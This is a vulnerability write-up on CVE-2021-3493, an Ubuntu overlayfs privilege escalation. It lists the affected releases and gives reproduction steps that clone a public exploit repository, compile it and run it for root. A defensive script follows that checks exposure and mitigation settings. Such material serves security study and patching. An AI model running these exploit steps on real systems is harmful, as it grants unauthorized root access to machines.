CVE-2021-3493 Linux Privilege Escalation Kernel Vulnerability
Vulnerability description
CVE-2021-3493 is an Ubuntu-specific issue in the overlayfs filesystem in the Linux kernel: overlayfs did not correctly validate the application of file capabilities with respect to user namespaces. The Ubuntu kernel allows low-privileged users to mount overlayfs filesystems inside user namespaces created with unshare(). When setxattr() is used to set the security.capability extended attribute on a file in the merged mount directory, overlayfs, because of how it works, actually modifies the extended attribute of the corresponding file in the upper directory under init_user_ns, which results in local privilege escalation.
Vulnerability impact
- Ubuntu 20.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
- Ubuntu 14.04 ESM (Linux kernel version < 5.11)
Vulnerability reproduction
Download address of the image with this vulnerability: http://mirrors.ustc.edu.cn/ubuntu-releases/16.04/
EXP download address: https://github.com/briskets/CVE-2021-3493
Execute the following code for privilege escalation
git clone https://github.com/inspiringz/CVE-2021-3493.git
gcc exploit.c -o exploit
chmod +x exploit
./exploit whoami
As shown in the figure, the privilege escalation is successful
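A defender-side check for the two preconditions the write-up describes (a kernel below the stated 5.11 threshold and unprivileged user namespace creation being allowed). This is an added example, not part of the original write-up or the exploit repository; it assumes the Ubuntu-specific sysctl kernel.unprivileged_userns_clone under /proc/sys, and treats the 5.11 cutoff as a coarse screen only, since Ubuntu backports the fix into older kernel packages.

```shell
#!/bin/sh
# Added CVE-2021-3493 exposure check (not from the original page).
# Assumption: Ubuntu's kernel.unprivileged_userns_clone sysctl is readable
# at ROOT/proc/sys/kernel/unprivileged_userns_clone (ROOT is "" on a live host).

# version_below_5_11 "5.4.0-42-generic" -> exit 0 when major.minor < 5.11
# This only encodes the page's stated threshold; a patched 5.4 Ubuntu
# package is still reported as below threshold.
version_below_5_11() {
    major=$(printf '%s' "$1" | cut -d. -f1)
    minor=$(printf '%s' "$1" | cut -d. -f2 | sed 's/[^0-9].*//')
    if [ "$major" -lt 5 ]; then return 0; fi
    if [ "$major" -eq 5 ] && [ "$minor" -lt 11 ]; then return 0; fi
    return 1
}

# userns_unprivileged_allowed ROOT -> exit 0 when low-privileged users can
# create user namespaces (the unshare() precondition the write-up relies on).
userns_unprivileged_allowed() {
    f="$1/proc/sys/kernel/unprivileged_userns_clone"
    if [ -r "$f" ]; then
        [ "$(cat "$f")" = "1" ]
    else
        # Sysctl absent: upstream kernels allow unprivileged userns by default.
        return 0
    fi
}

# exposure_status ROOT KERNEL_RELEASE -> prints one of:
#   above-threshold        kernel is >= 5.11
#   userns-restricted      unprivileged userns creation disabled (mitigation)
#   preconditions-present  both preconditions hold; verify the kernel package
exposure_status() {
    root="$1"; rel="$2"
    if ! version_below_5_11 "$rel"; then
        echo "above-threshold"; return 0
    fi
    if ! userns_unprivileged_allowed "$root"; then
        echo "userns-restricted"; return 0
    fi
    echo "preconditions-present"
}

# Live usage: exposure_status "" "$(uname -r)"
```

Setting kernel.unprivileged_userns_clone=0 removes the unshare() precondition, but installing the fixed kernel package is the actual remediation.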